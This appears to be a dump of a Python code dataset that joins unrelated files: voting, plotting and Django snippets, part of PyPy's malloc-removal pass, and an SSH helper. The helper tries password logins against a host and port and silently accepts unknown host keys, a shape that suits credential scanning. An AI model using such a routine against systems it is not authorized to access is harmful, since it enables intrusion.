content stringlengths 0 1.05M | origin stringclasses 2
values | type stringclasses 2
values |
|---|---|---|
# Inspired by:
# https://codereview.stackexchange.com/questions/42359/condorcet-voting-method-in-oop-python
# and https://github.com/bradbeattie/python-vote-core/tree/master/pyvotecore
import sys
import os
import itertools
def main():
    """Script entry point.

    Reads a ballot file named on the command line, tallies pairwise
    preferences and prints the Condorcet winner (or None when there is
    no candidate that beats every other one).
    """
    if len(sys.argv) < 2:
        # Previously an IndexError; give a usage message instead.
        print("Usage: {} <ballot-file>".format(sys.argv[0]))
        sys.exit(1)
    file = sys.argv[1]
    if not os.path.isfile(file):
        print("File path {} does not exist. Exiting...".format(file))
        # BUGFIX: sys.exit() exits with status 0, hiding the failure
        # from callers; exit non-zero on error.
        sys.exit(1)
    vote_results = get_data_from_file(file)
    print("The votes are {}.".format(vote_results))
    choices, scores = build_dict(vote_results)
    results = matches_choices(choices, scores)
    print("Pairwise results are {}.".format(results))
    print("The winner is {}.".format(elect_winner(choices, results)))
def get_data_from_file(filepath):
    """Read a whitespace-separated ballot file.

    Comment lines (starting with '#') and blank lines are skipped;
    every other line is split into its four whitespace-separated
    fields.

    Returns a list of 4-tuples of strings, one per ballot line.
    """
    ballots = []
    with open(filepath, encoding='utf-8') as handle:
        for raw_line in handle:
            if raw_line.startswith('#') or raw_line in ('\n', '\r\n'):
                continue
            # NOTE(review): maxsplit=4 yields five fields on a 5+-column
            # line, so the 4-way unpack raises ValueError there -- the
            # format is presumably exactly four columns; confirm.
            first, second, third, fourth = raw_line.split(None, 4)
            ballots.append((first, second, third, fourth))
    return ballots
def build_dict(votes):
    """Tally pairwise preferences over all ballots.

    Returns (choices, scores): `choices` is the set of all candidates
    seen on any ballot; `scores` maps each ordered pair (a, b) to the
    number of ballots that rank a ahead of b.
    """
    choices = set()
    scores = {}
    for ballot in votes:
        choices.update(ballot)
        for preferred, other in itertools.permutations(ballot, 2):
            key = (preferred, other)
            scores.setdefault(key, 0)
            # earlier position on the ballot == higher preference
            if ballot.index(preferred) < ballot.index(other):
                scores[key] += 1
    return choices, scores
def matches_choices(choices, scores):
    """Decide the winner of every head-to-head pairing.

    Returns a dict mapping each unordered pair (as the tuple produced
    by itertools.combinations) to the winning candidate.

    NOTE(review): a tie goes to the second element of the pair -- there
    is no explicit tie detection.
    """
    results = {}
    for pair in itertools.combinations(choices, 2):
        first, second = pair
        if scores[pair] > scores[(second, first)]:
            results[pair] = first
        else:
            results[pair] = second
    return results
def elect_winner(choices, results):
    """Return the Condorcet winner, i.e. the choice that wins its
    pairwise match against every other choice.

    Returns None when no such choice exists (does not detect
    Condorcet cycles, as in the original).
    """
    needed = len(choices) - 1
    for candidate in choices:
        wins = sum(1 for pair, winner in results.items()
                   if candidate in pair and winner == candidate)
        if wins == needed:
            return candidate
# Run the election only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| nilq/baby-python | python |
import os, time
def cmd(cmdd):
    # Thin wrapper: run `cmdd` through the system shell and wait for it.
    # NOTE(review): the "cls" call below implies this targets Windows.
    os.system(cmdd)
# Restart loop: every 2 seconds clear the console and re-run app.py.
# Blocks forever; os.system waits for app.py to exit, so the effective
# period is 2 seconds plus app.py's own runtime.
while(True):
    time.sleep(2)
    cmd("cls")
    cmd("python app.py")
| nilq/baby-python | python |
import getpass
import sys
from constants import cx_status
import paramiko
# setup logging
paramiko.util.log_to_file("/tmp/paramiko.log")
# Paramiko client configuration: prefer GSS-API (Kerberos) auth and key
# exchange whenever paramiko reports that GSS support is available.
UseGSSAPI = ( paramiko.GSS_AUTH_AVAILABLE)
DoGSSAPIKeyExchange = ( paramiko.GSS_AUTH_AVAILABLE)
class SilentPolicy(paramiko.MissingHostKeyPolicy):
    """
    Host-key policy that silently tolerates unknown host keys: the
    connection proceeds, but the key is not added to any known_hosts
    store. Used by `.SSHClient`.
    """
    def missing_host_key(self, client, hostname, key):
        # Returning without raising accepts the key for this session only.
        pass
def try_login(hostname, port, username, password, verbose, timeout):
    """Attempt a single SSH password login against hostname:port.

    Returns one of the cx_status constants:
      - cx_status.NOT_LISTENING: port closed, or filtered/unreachable
      - cx_status.ERROR: credentials rejected, or any unexpected failure
      - cx_status.CONNECTED: login succeeded and a shell could be opened
    """
    try:
        client = paramiko.SSHClient()
        client.load_system_host_keys()
        # Tolerate unknown host keys without persisting them.
        client.set_missing_host_key_policy(SilentPolicy())
        if verbose:
            print("Trying to connect... {}/{}@{}:{}".format(username, password, hostname, port))
        if not UseGSSAPI and not DoGSSAPIKeyExchange:
            try:
                client.connect(hostname, port, username, password,
                               timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
            except paramiko.ssh_exception.NoValidConnectionsError:
                # closed port
                return cx_status.NOT_LISTENING
            except paramiko.ssh_exception.AuthenticationException:
                # port open, credentials rejected
                return cx_status.ERROR
            except Exception:
                try:
                    client.close()
                except Exception:
                    pass
                # filtered port (timeout or other transport-level failure)
                return cx_status.NOT_LISTENING
        else:
            # BUGFIX: the original `raise ("not tested code")` raised a
            # plain string, which is a TypeError in Python 3; raise a
            # real exception. The GSSAPI path below is intentionally
            # kept but remains unreachable/untested.
            raise RuntimeError("not tested code")
            try:
                client.connect( hostname, port, username, gss_auth=UseGSSAPI, gss_kex=DoGSSAPIKeyExchange,
                               timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
            except Exception:
                password = getpass.getpass( "Password for %s@%s: " % (username, hostname))
                try:
                    client.connect(hostname, port, username, password,
                                   timeout=timeout, banner_timeout=timeout, auth_timeout=timeout)
                    try:
                        client.close()
                    except Exception:
                        pass
                except Exception:
                    try:
                        client.close()
                    except Exception:
                        pass
                    return cx_status.ERROR
        # Opening (and immediately closing) a shell proves the account
        # is actually usable, not just authenticated.
        chan = client.invoke_shell()
        chan.close()
        client.close()
        return cx_status.CONNECTED
    except Exception as e:
        print("*** Caught exception: %s: %s" % (e.__class__, e))
        try:
            client.close()
        except Exception:  # BUGFIX: was a bare except (trapped SystemExit/KeyboardInterrupt)
            pass
        return cx_status.ERROR
| nilq/baby-python | python |
# Utilities for reading score-files
import numpy as np
from utils.data_loading import readlines_and_split_spaces
def load_scorefile_and_split_to_arrays(scorefile_path):
    """Load a whitespace-separated score file and transpose it.

    Each line holds whitespace-separated columns; the result is a list
    containing one numpy array per column.
    """
    rows = readlines_and_split_spaces(scorefile_path)
    columns = zip(*rows)
    return [np.array(column) for column in columns]
def load_scorefile_and_split_scores(scorefile_path):
    """Load a scorefile and split its scores into three numpy arrays.

    Each line is `is_target score [optional ...]` where is_target is
    "True" or "False" and score is a float.

    Returns (target_scores, nontarget_scores, original_scores), where
    original_scores holds every kept score in file order.
    """
    lines = readlines_and_split_spaces(scorefile_path)
    target_scores = []
    nontarget_scores = []
    original_scores = []
    for line in lines:
        # Missing trials are written as the literal string "None"; skip.
        if line[1] == "None":
            continue
        score = float(line[1])
        original_scores.append(score)
        bucket = target_scores if line[0] == "True" else nontarget_scores
        bucket.append(score)
    return (np.array(target_scores),
            np.array(nontarget_scores),
            np.array(original_scores))
| nilq/baby-python | python |
import numpy as np
from numpngw import write_apng
# Example 5
#
# Create an 8-bit RGB animated PNG file.
# Build a 25-frame animation of a magenta (R == B) sine wave sweeping
# across a 20x200 RGB image, then write it as an animated PNG.
height = 20
width = 200
t = np.linspace(0, 10*np.pi, width)
seq = []
for phase in np.linspace(0, 2*np.pi, 25, endpoint=False):
    wave = 75*(1 + np.sin(t - phase))   # 150*0.5 == 75; range [0, 150]
    frame = np.zeros((height, width, 3), dtype=np.uint8)
    frame[:, :, 0] = wave               # red channel
    frame[:, :, 2] = wave               # blue channel -> magenta
    seq.append(frame)
write_apng("example5.png", seq, delay=50, use_palette=True)
| nilq/baby-python | python |
from django.apps import AppConfig
class TmplConfig(AppConfig):
    """Django application configuration for the 'tmpl' app."""
    name = 'tmpl'
| nilq/baby-python | python |
from rpython.flowspace.model import Variable, Constant, Block, Link
from rpython.flowspace.model import SpaceOperation, FunctionGraph, copygraph
from rpython.flowspace.model import checkgraph
from rpython.flowspace.model import c_last_exception
from rpython.translator.backendopt.support import log
from rpython.translator.simplify import join_blocks
from rpython.translator.unsimplify import varoftype
from rpython.rtyper.typesystem import getfunctionptr
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
def virtualize_mallocs(translator, graphs, verbose=False):
    """Entry point: repeatedly run malloc removal over `graphs` until no
    further progress is made, then check and simplify every graph.

    Specialized graphs created along the way are appended to
    translator.graphs; the `graphs` list passed in is left untouched.
    """
    newgraphs = graphs[:]
    mallocv = MallocVirtualizer(newgraphs, translator.rtyper, verbose)
    while mallocv.remove_mallocs_once():
        pass
    for graph in newgraphs:
        checkgraph(graph)
        join_blocks(graph)
    # the original graphs must still be the unchanged prefix of newgraphs
    assert newgraphs[:len(graphs)] == graphs
    del newgraphs[:len(graphs)]
    translator.graphs.extend(newgraphs)
# ____________________________________________________________
class MallocTypeDesc(object):
    """Static description of one GcStruct whose mallocs we try to remove:
    a flat field list (inlined parent structs expanded), plus
    name->index and name->declaring-substruct mappings.

    Raises CannotRemoveThisType for non-GcStructs, structs with a
    destructor, and structs containing inlined container fields.
    """

    def __init__(self, MALLOCTYPE):
        if not isinstance(MALLOCTYPE, lltype.GcStruct):
            raise CannotRemoveThisType
        self.MALLOCTYPE = MALLOCTYPE
        self.check_no_destructor()
        self.names_and_types = []
        self.name2index = {}
        self.name2subtype = {}
        self.initialize_type(MALLOCTYPE)
        #self.immutable_struct = MALLOCTYPE._hints.get('immutable')

    def check_no_destructor(self):
        # A destructor would have to run at deallocation time; such
        # structs cannot be virtualized away.
        STRUCT = self.MALLOCTYPE
        try:
            rttiptr = lltype.getRuntimeTypeInfo(STRUCT)
        except ValueError:
            return    # ok
        destr_ptr = getattr(rttiptr._obj, 'destructor_funcptr', None)
        if destr_ptr:
            raise CannotRemoveThisType

    def initialize_type(self, TYPE):
        fieldnames = TYPE._names
        firstname, FIRSTTYPE = TYPE._first_struct()
        if FIRSTTYPE is not None:
            # recursively flatten the inlined parent structure first
            self.initialize_type(FIRSTTYPE)
            fieldnames = fieldnames[1:]
        for name in fieldnames:
            FIELDTYPE = TYPE._flds[name]
            if isinstance(FIELDTYPE, lltype.ContainerType):
                raise CannotRemoveThisType("inlined substructure")
            self.name2index[name] = len(self.names_and_types)
            self.names_and_types.append((name, FIELDTYPE))
            self.name2subtype[name] = TYPE
class SpecNode(object):
    """Abstract base for specialization nodes (runtime or virtual)."""
    pass
class RuntimeSpecNode(SpecNode):
    """A value that remains a real runtime Variable in the specialized
    graph (as opposed to a virtualized structure)."""

    def __init__(self, name, TYPE):
        self.name = name
        self.TYPE = TYPE

    def newvar(self):
        # Make a fresh flow-graph Variable of this node's type.
        v = Variable(self.name)
        v.concretetype = self.TYPE
        return v

    def getfrozenkey(self, memo):
        # All runtime nodes are interchangeable for specialization keys.
        return 'R'

    def accumulate_nodes(self, rtnodes, vtnodes):
        rtnodes.append(self)

    def copy(self, memo, flagreadonly):
        return RuntimeSpecNode(self.name, self.TYPE)

    def bind_rt_nodes(self, memo, newnodes_iter):
        # Consume exactly one replacement node (Python 2 iterator API).
        return newnodes_iter.next()
class VirtualSpecNode(SpecNode):
    """A malloc'ed structure replaced by its individual fields; `fields`
    holds one SpecNode per flattened field of `typedesc`."""

    def __init__(self, typedesc, fields, readonly=False):
        self.typedesc = typedesc
        self.fields = fields     # list of SpecNodes
        self.readonly = readonly

    def getfrozenkey(self, memo):
        # `memo` handles sharing/cycles: a revisited node is keyed by the
        # integer assigned on first visit.
        if self in memo:
            return memo[self]
        else:
            memo[self] = len(memo)
            result = [self.typedesc, self.readonly]
            for subnode in self.fields:
                result.append(subnode.getfrozenkey(memo))
            return tuple(result)

    def accumulate_nodes(self, rtnodes, vtnodes):
        if self in vtnodes:
            return
        vtnodes[self] = True
        for subnode in self.fields:
            subnode.accumulate_nodes(rtnodes, vtnodes)

    def copy(self, memo, flagreadonly):
        # Deep copy preserving sharing via `memo`; nodes listed in
        # `flagreadonly` become read-only in the copy.
        if self in memo:
            return memo[self]
        readonly = self.readonly or self in flagreadonly
        newnode = VirtualSpecNode(self.typedesc, [], readonly)
        memo[self] = newnode
        for subnode in self.fields:
            newnode.fields.append(subnode.copy(memo, flagreadonly))
        return newnode

    def bind_rt_nodes(self, memo, newnodes_iter):
        if self in memo:
            return memo[self]
        newnode = VirtualSpecNode(self.typedesc, [], self.readonly)
        memo[self] = newnode
        for subnode in self.fields:
            newnode.fields.append(subnode.bind_rt_nodes(memo, newnodes_iter))
        return newnode
class VirtualFrame(object):
    """One frame of the virtual call stack tracked during specialization:
    a position (sourceblock, nextopindex) plus the SpecNodes attached to
    the variables alive there, linked to an optional caller frame."""

    def __init__(self, sourceblock, nextopindex,
                 allnodes, callerframe=None, calledgraphs={}):
        # `allnodes` is either a {Variable: SpecNode} dict (mid-block
        # position) or a plain node list matching the block inputargs.
        if isinstance(allnodes, dict):
            self.varlist = vars_alive_through_op(sourceblock, nextopindex)
            self.nodelist = [allnodes[v] for v in self.varlist]
        else:
            assert nextopindex == 0
            self.varlist = sourceblock.inputargs
            self.nodelist = allnodes[:]
        self.sourceblock = sourceblock
        self.nextopindex = nextopindex
        self.callerframe = callerframe
        # NOTE(review): the {} default is shared across calls but is
        # never mutated in this class -- confirm callers treat it as
        # read-only.
        self.calledgraphs = calledgraphs

    def get_nodes_in_use(self):
        return dict(zip(self.varlist, self.nodelist))

    def shallowcopy(self):
        newframe = VirtualFrame.__new__(VirtualFrame)
        newframe.varlist = self.varlist
        newframe.nodelist = self.nodelist
        newframe.sourceblock = self.sourceblock
        newframe.nextopindex = self.nextopindex
        newframe.callerframe = self.callerframe
        newframe.calledgraphs = self.calledgraphs
        return newframe

    def copy(self, memo, flagreadonly={}):
        # Deep-copies the node lists (and, recursively, caller frames)
        # through one shared memo so node sharing is preserved.
        newframe = self.shallowcopy()
        newframe.nodelist = [node.copy(memo, flagreadonly)
                             for node in newframe.nodelist]
        if newframe.callerframe is not None:
            newframe.callerframe = newframe.callerframe.copy(memo,
                                                             flagreadonly)
        return newframe

    def enum_call_stack(self):
        # Yield self first, then each caller outward.
        frame = self
        while frame is not None:
            yield frame
            frame = frame.callerframe

    def getfrozenkey(self):
        # Hashable key identifying this whole stack of positions+nodes;
        # used to memoize specialized blocks/graphs.
        memo = {}
        key = []
        for frame in self.enum_call_stack():
            key.append(frame.sourceblock)
            key.append(frame.nextopindex)
            for node in frame.nodelist:
                key.append(node.getfrozenkey(memo))
        return tuple(key)

    def find_all_nodes(self):
        rtnodes = []
        vtnodes = {}
        for frame in self.enum_call_stack():
            for node in frame.nodelist:
                node.accumulate_nodes(rtnodes, vtnodes)
        return rtnodes, vtnodes

    def find_rt_nodes(self):
        rtnodes, vtnodes = self.find_all_nodes()
        return rtnodes

    def find_vt_nodes(self):
        rtnodes, vtnodes = self.find_all_nodes()
        return vtnodes
def copynodes(nodelist, flagreadonly={}):
    """Deep-copy a list of SpecNodes through one shared memo, so shared
    subtrees stay shared; nodes in `flagreadonly` are copied read-only.
    (The {} default is never mutated here, only passed through.)"""
    shared_memo = {}
    copies = []
    for node in nodelist:
        copies.append(node.copy(shared_memo, flagreadonly))
    return copies
def find_all_nodes(nodelist):
    """Collect every node reachable from `nodelist`: RuntimeSpecNodes in
    order in a list, VirtualSpecNodes in a dict used as an ordered set."""
    runtime_nodes = []
    virtual_nodes = {}
    for root in nodelist:
        root.accumulate_nodes(runtime_nodes, virtual_nodes)
    return runtime_nodes, virtual_nodes
def is_trivial_nodelist(nodelist):
    """True iff every node is a plain RuntimeSpecNode (no virtuals)."""
    return all(isinstance(node, RuntimeSpecNode) for node in nodelist)
def bind_rt_nodes(srcnodelist, newnodes_list):
    """Return srcnodelist with all RuntimeNodes replaced by nodes coming
    from newnodes_list.

    Asserts that newnodes_list is fully consumed: exactly one entry per
    RuntimeNode occurrence in srcnodelist.
    """
    memo = {}
    replacements = iter(newnodes_list)
    bound = [node.bind_rt_nodes(memo, replacements) for node in srcnodelist]
    leftovers = list(replacements)
    assert leftovers == [], "too many nodes in newnodes_list"
    return bound
class CannotVirtualize(Exception):
    """Raised when a malloc cannot be removed at its current position."""
    pass
class ForcedInline(Exception):
    """Raised to request that the graph containing the malloc be inlined
    into its caller before retrying."""
    pass
class CannotRemoveThisType(Exception):
    """Raised when a malloc'ed type is inherently not removable."""
    pass
# ____________________________________________________________
class MallocVirtualizer(object):
    """Driver: finds removable mallocs across all graphs and orchestrates
    graph specialization until a fixpoint (Python 2 code)."""

    def __init__(self, graphs, rtyper, verbose=False):
        self.graphs = graphs
        self.rtyper = rtyper
        self.excdata = rtyper.getexceptiondata()
        self.graphbuilders = {}
        self.specialized_graphs = {}
        self.specgraphorigin = {}
        self.inline_and_remove = {}    # {graph: op_to_remove}
        self.inline_and_remove_seen = {}    # set of (graph, op_to_remove)
        self.malloctypedescs = {}
        self.count_virtualized = 0
        self.verbose = verbose
        self.EXCTYPE_to_vtable = self.build_obscure_mapping()

    def build_obscure_mapping(self):
        # Map each instance structure type to its vtable constant, so a
        # virtualized exception value can be matched back to its class.
        result = {}
        for rinstance in self.rtyper.instance_reprs.values():
            result[rinstance.lowleveltype.TO] = rinstance.rclass.getvtable()
        return result

    def report_result(self, progress):
        if progress:
            log.mallocv('removed %d mallocs so far' % self.count_virtualized)
        else:
            log.mallocv('done')

    def enum_all_mallocs(self, graph):
        # Yield (block, op) for every malloc of a removable type, and for
        # every direct_call to a graph marked for inline-and-remove.
        for block in graph.iterblocks():
            for op in block.operations:
                if op.opname == 'malloc':
                    MALLOCTYPE = op.result.concretetype.TO
                    try:
                        self.getmalloctypedesc(MALLOCTYPE)
                    except CannotRemoveThisType:
                        pass
                    else:
                        yield (block, op)
                elif op.opname == 'direct_call':
                    graph = graph_called_by(op)
                    if graph in self.inline_and_remove:
                        yield (block, op)

    def remove_mallocs_once(self):
        # One pass over all graphs; returns a truthy value iff any
        # progress (removal or new inline request) was made.
        self.flush_failed_specializations()
        prev = self.count_virtualized
        count_inline_and_remove = len(self.inline_and_remove)
        for graph in self.graphs:
            seen = {}
            while True:
                for block, op in self.enum_all_mallocs(graph):
                    if op.result not in seen:
                        seen[op.result] = True
                        if self.try_remove_malloc(graph, block, op):
                            break    # graph mutated, restart enum_all_mallocs()
                else:
                    break    # enum_all_mallocs() exhausted, graph finished
        progress1 = self.count_virtualized - prev
        progress2 = len(self.inline_and_remove) - count_inline_and_remove
        progress = progress1 or bool(progress2)
        self.report_result(progress)
        return progress

    def flush_failed_specializations(self):
        # Forget 'fail' entries so they can be retried after other
        # removals may have changed the picture.
        for key, (mode, specgraph) in self.specialized_graphs.items():
            if mode == 'fail':
                del self.specialized_graphs[key]

    def fixup_except_block(self, exceptblock):
        # hack: this block's inputargs may be missing concretetypes...
        e1, v1 = exceptblock.inputargs
        e1.concretetype = self.excdata.lltype_of_exception_type
        v1.concretetype = self.excdata.lltype_of_exception_value

    def getmalloctypedesc(self, MALLOCTYPE):
        # Cached; raises CannotRemoveThisType for unremovable types.
        try:
            dsc = self.malloctypedescs[MALLOCTYPE]
        except KeyError:
            dsc = self.malloctypedescs[MALLOCTYPE] = MallocTypeDesc(MALLOCTYPE)
        return dsc

    def try_remove_malloc(self, graph, block, op):
        # Attempt to remove one malloc; True iff the graph was rewritten.
        if (graph, op) in self.inline_and_remove_seen:
            return False    # no point in trying again
        graphbuilder = GraphBuilder(self, graph)
        if graph in self.graphbuilders:
            graphbuilder.initialize_from_old_builder(self.graphbuilders[graph])
        graphbuilder.start_from_a_malloc(graph, block, op.result)
        try:
            graphbuilder.propagate_specializations()
        except CannotVirtualize, e:
            self.logresult(op, 'failed', e)
            return False
        except ForcedInline, e:
            self.logresult(op, 'forces inlining', e)
            self.inline_and_remove[graph] = op
            self.inline_and_remove_seen[graph, op] = True
            return False
        else:
            self.logresult(op, 'removed')
            graphbuilder.finished_removing_malloc()
            self.graphbuilders[graph] = graphbuilder
            self.count_virtualized += 1
            return True

    def logresult(self, op, msg, exc=None):    # only for nice log outputs
        if self.verbose:
            if exc is None:
                exc = ''
            else:
                exc = ': %s' % (exc,)
            chain = []
            while True:
                chain.append(str(op.result))
                if op.opname != 'direct_call':
                    break
                fobj = op.args[0].value._obj
                op = self.inline_and_remove[fobj.graph]
            log.mallocv('%s %s%s' % ('->'.join(chain), msg, exc))
        elif exc is None:
            log.dot()

    def get_specialized_graph(self, graph, nodelist):
        # Returns (kind, graph) where kind is 'trivial', 'call',
        # 'inline' or 'fail'; results are memoized by frozen key.
        assert len(graph.getargs()) == len(nodelist)
        if is_trivial_nodelist(nodelist):
            return 'trivial', graph
        if graph in self.specgraphorigin:
            # re-express the request in terms of the original graph
            orggraph, orgnodelist = self.specgraphorigin[graph]
            nodelist = bind_rt_nodes(orgnodelist, nodelist)
            graph = orggraph
        virtualframe = VirtualFrame(graph.startblock, 0, nodelist)
        key = virtualframe.getfrozenkey()
        try:
            return self.specialized_graphs[key]
        except KeyError:
            self.build_specialized_graph(graph, key, nodelist)
            return self.specialized_graphs[key]

    def build_specialized_graph(self, graph, key, nodelist):
        graph2 = copygraph(graph)
        virtualframe = VirtualFrame(graph2.startblock, 0, nodelist)
        graphbuilder = GraphBuilder(self, graph2)
        specblock = graphbuilder.start_from_virtualframe(virtualframe)
        specgraph = graph2
        specgraph.name += '_mallocv'
        specgraph.startblock = specblock
        # registered before propagation so recursive requests hit the cache
        self.specialized_graphs[key] = ('call', specgraph)
        try:
            graphbuilder.propagate_specializations()
        except ForcedInline, e:
            if self.verbose:
                log.mallocv('%s inlined: %s' % (graph.name, e))
            self.specialized_graphs[key] = ('inline', None)
        except CannotVirtualize, e:
            if self.verbose:
                log.mallocv('%s failing: %s' % (graph.name, e))
            self.specialized_graphs[key] = ('fail', None)
        else:
            self.graphbuilders[specgraph] = graphbuilder
            self.specgraphorigin[specgraph] = graph, nodelist
            self.graphs.append(specgraph)
class GraphBuilder(object):
    """Builds specialized versions of the blocks of one graph, driven by
    a worklist of pending BlockSpecializers."""

    def __init__(self, mallocv, graph):
        self.mallocv = mallocv
        self.graph = graph
        self.specialized_blocks = {}
        self.pending_specializations = []

    def initialize_from_old_builder(self, oldbuilder):
        # Reuse already-specialized blocks from a previous attempt.
        self.specialized_blocks.update(oldbuilder.specialized_blocks)

    def start_from_virtualframe(self, startframe):
        spec = BlockSpecializer(self)
        spec.initialize_renamings(startframe)
        self.pending_specializations.append(spec)
        return spec.specblock

    def start_from_a_malloc(self, graph, block, v_result):
        # Begin specialization at the block containing the malloc whose
        # result is v_result; the patched block replaces it on success.
        assert v_result in [op.result for op in block.operations]
        nodelist = []
        for v in block.inputargs:
            nodelist.append(RuntimeSpecNode(v, v.concretetype))
        trivialframe = VirtualFrame(block, 0, nodelist)
        spec = BlockSpecializer(self, v_result)
        spec.initialize_renamings(trivialframe, keep_inputargs=True)
        self.pending_specializations.append(spec)
        self.pending_patch = (block, spec.specblock)

    def finished_removing_malloc(self):
        # Splice the specialized block's content into the original block.
        (srcblock, specblock) = self.pending_patch
        srcblock.inputargs = specblock.inputargs
        srcblock.operations = specblock.operations
        srcblock.exitswitch = specblock.exitswitch
        srcblock.recloseblock(*specblock.exits)

    def create_outgoing_link(self, currentframe, targetblock,
                             nodelist, renamings, v_expand_malloc=None):
        # Build the Link that leaves the current specialized block,
        # handling virtual exception raising, returns across the virtual
        # call stack, and further block specialization.
        assert len(nodelist) == len(targetblock.inputargs)
        #
        if is_except(targetblock):
            v_expand_malloc = None
            # walk the virtual call stack looking for a frame that
            # catches the exception
            while currentframe.callerframe is not None:
                currentframe = currentframe.callerframe
                newlink = self.handle_catch(currentframe, nodelist, renamings)
                if newlink:
                    return newlink
            else:
                # nobody caught it: the exception escapes the stack
                targetblock = self.exception_escapes(nodelist, renamings)
                assert len(nodelist) == len(targetblock.inputargs)
        if (currentframe.callerframe is None and
                is_trivial_nodelist(nodelist)):
            # there is no more VirtualSpecNodes being passed around,
            # so we can stop specializing
            rtnodes = nodelist
            specblock = targetblock
        else:
            if is_return(targetblock):
                v_expand_malloc = None
                newframe = self.return_to_caller(currentframe, nodelist[0])
            else:
                targetnodes = dict(zip(targetblock.inputargs, nodelist))
                newframe = VirtualFrame(targetblock, 0, targetnodes,
                                        callerframe=currentframe.callerframe,
                                        calledgraphs=currentframe.calledgraphs)
            rtnodes = newframe.find_rt_nodes()
            specblock = self.get_specialized_block(newframe, v_expand_malloc)
        linkargs = [renamings[rtnode] for rtnode in rtnodes]
        return Link(linkargs, specblock)

    def return_to_caller(self, currentframe, retnode):
        # Pop one virtual frame: the caller resumes with `retnode`
        # substituted for its FutureReturnValue placeholder.
        callerframe = currentframe.callerframe
        if callerframe is None:
            raise ForcedInline("return block")
        nodelist = callerframe.nodelist
        callerframe = callerframe.shallowcopy()
        callerframe.nodelist = []
        for node in nodelist:
            if isinstance(node, FutureReturnValue):
                node = retnode
            callerframe.nodelist.append(node)
        return callerframe

    def handle_catch(self, catchingframe, nodelist, renamings):
        # Try to match a virtually-raised exception against the except
        # links of `catchingframe`; returns the new Link, or None.
        if not self.has_exception_catching(catchingframe):
            return None
        [exc_node, exc_value_node] = nodelist
        v_exc_type = renamings.get(exc_node)
        if isinstance(v_exc_type, Constant):
            exc_type = v_exc_type.value
        elif isinstance(exc_value_node, VirtualSpecNode):
            # recover the type from the virtualized exception instance
            EXCTYPE = exc_value_node.typedesc.MALLOCTYPE
            exc_type = self.mallocv.EXCTYPE_to_vtable[EXCTYPE]
        else:
            raise CannotVirtualize("raising non-constant exc type")
        excdata = self.mallocv.excdata
        assert catchingframe.sourceblock.exits[0].exitcase is None
        for catchlink in catchingframe.sourceblock.exits[1:]:
            if excdata.fn_exception_match(exc_type, catchlink.llexitcase):
                # Match found.  Follow this link.
                mynodes = catchingframe.get_nodes_in_use()
                for node, attr in zip(nodelist,
                                      ['last_exception', 'last_exc_value']):
                    v = getattr(catchlink, attr)
                    if isinstance(v, Variable):
                        mynodes[v] = node
                #
                nodelist = []
                for v in catchlink.args:
                    if isinstance(v, Variable):
                        node = mynodes[v]
                    else:
                        node = getconstnode(v, renamings)
                    nodelist.append(node)
                return self.create_outgoing_link(catchingframe,
                                                 catchlink.target,
                                                 nodelist, renamings)
        else:
            # No match at all, propagate the exception to the caller
            return None

    def has_exception_catching(self, catchingframe):
        # A frame catches only if it stopped exactly after its last
        # operation and the block's exitswitch is c_last_exception.
        if catchingframe.sourceblock.exitswitch != c_last_exception:
            return False
        else:
            operations = catchingframe.sourceblock.operations
            assert 1 <= catchingframe.nextopindex <= len(operations)
            return catchingframe.nextopindex == len(operations)

    def exception_escapes(self, nodelist, renamings):
        # the exception escapes
        if not is_trivial_nodelist(nodelist):
            # start of hacks to help handle_catch()
            [exc_node, exc_value_node] = nodelist
            v_exc_type = renamings.get(exc_node)
            if isinstance(v_exc_type, Constant):
                # cannot improve: handle_catch() would already be happy
                # by seeing the exc_type as a constant
                pass
            elif isinstance(exc_value_node, VirtualSpecNode):
                # can improve with a strange hack: we pretend that
                # the source code jumps to a block that itself allocates
                # the exception, sets all fields, and raises it by
                # passing a constant type.
                typedesc = exc_value_node.typedesc
                return self.get_exc_reconstruction_block(typedesc)
            else:
                # cannot improve: handle_catch() will have no clue about
                # the exception type
                pass
            raise CannotVirtualize("except block")
        targetblock = self.graph.exceptblock
        self.mallocv.fixup_except_block(targetblock)
        return targetblock

    def get_exc_reconstruction_block(self, typedesc):
        # Build a block that re-materializes a virtualized exception:
        # malloc the exception struct, copy every field from the
        # incoming (virtual) value, and jump to the graph's exceptblock
        # with a constant vtable.
        exceptblock = self.graph.exceptblock
        self.mallocv.fixup_except_block(exceptblock)
        TEXC = exceptblock.inputargs[0].concretetype
        TVAL = exceptblock.inputargs[1].concretetype
        #
        v_ignored_type = varoftype(TEXC)
        v_incoming_value = varoftype(TVAL)
        block = Block([v_ignored_type, v_incoming_value])
        #
        c_EXCTYPE = Constant(typedesc.MALLOCTYPE, lltype.Void)
        v = varoftype(lltype.Ptr(typedesc.MALLOCTYPE))
        c_flavor = Constant({'flavor': 'gc'}, lltype.Void)
        op = SpaceOperation('malloc', [c_EXCTYPE, c_flavor], v)
        block.operations.append(op)
        #
        for name, FIELDTYPE in typedesc.names_and_types:
            EXACTPTR = lltype.Ptr(typedesc.name2subtype[name])
            c_name = Constant(name)
            c_name.concretetype = lltype.Void
            #
            v_in = varoftype(EXACTPTR)
            op = SpaceOperation('cast_pointer', [v_incoming_value], v_in)
            block.operations.append(op)
            #
            v_field = varoftype(FIELDTYPE)
            op = SpaceOperation('getfield', [v_in, c_name], v_field)
            block.operations.append(op)
            #
            v_out = varoftype(EXACTPTR)
            op = SpaceOperation('cast_pointer', [v], v_out)
            block.operations.append(op)
            #
            v0 = varoftype(lltype.Void)
            op = SpaceOperation('setfield', [v_out, c_name, v_field], v0)
            block.operations.append(op)
        #
        v_exc_value = varoftype(TVAL)
        op = SpaceOperation('cast_pointer', [v], v_exc_value)
        block.operations.append(op)
        #
        exc_type = self.mallocv.EXCTYPE_to_vtable[typedesc.MALLOCTYPE]
        c_exc_type = Constant(exc_type, TEXC)
        block.closeblock(Link([c_exc_type, v_exc_value], exceptblock))
        return block

    def get_specialized_block(self, virtualframe, v_expand_malloc=None):
        # Memoized by the frame's frozen key; schedules a new
        # BlockSpecializer on a cache miss.
        key = virtualframe.getfrozenkey()
        specblock = self.specialized_blocks.get(key)
        if specblock is None:
            orgblock = virtualframe.sourceblock
            assert len(orgblock.exits) != 0
            spec = BlockSpecializer(self, v_expand_malloc)
            spec.initialize_renamings(virtualframe)
            self.pending_specializations.append(spec)
            specblock = spec.specblock
            self.specialized_blocks[key] = specblock
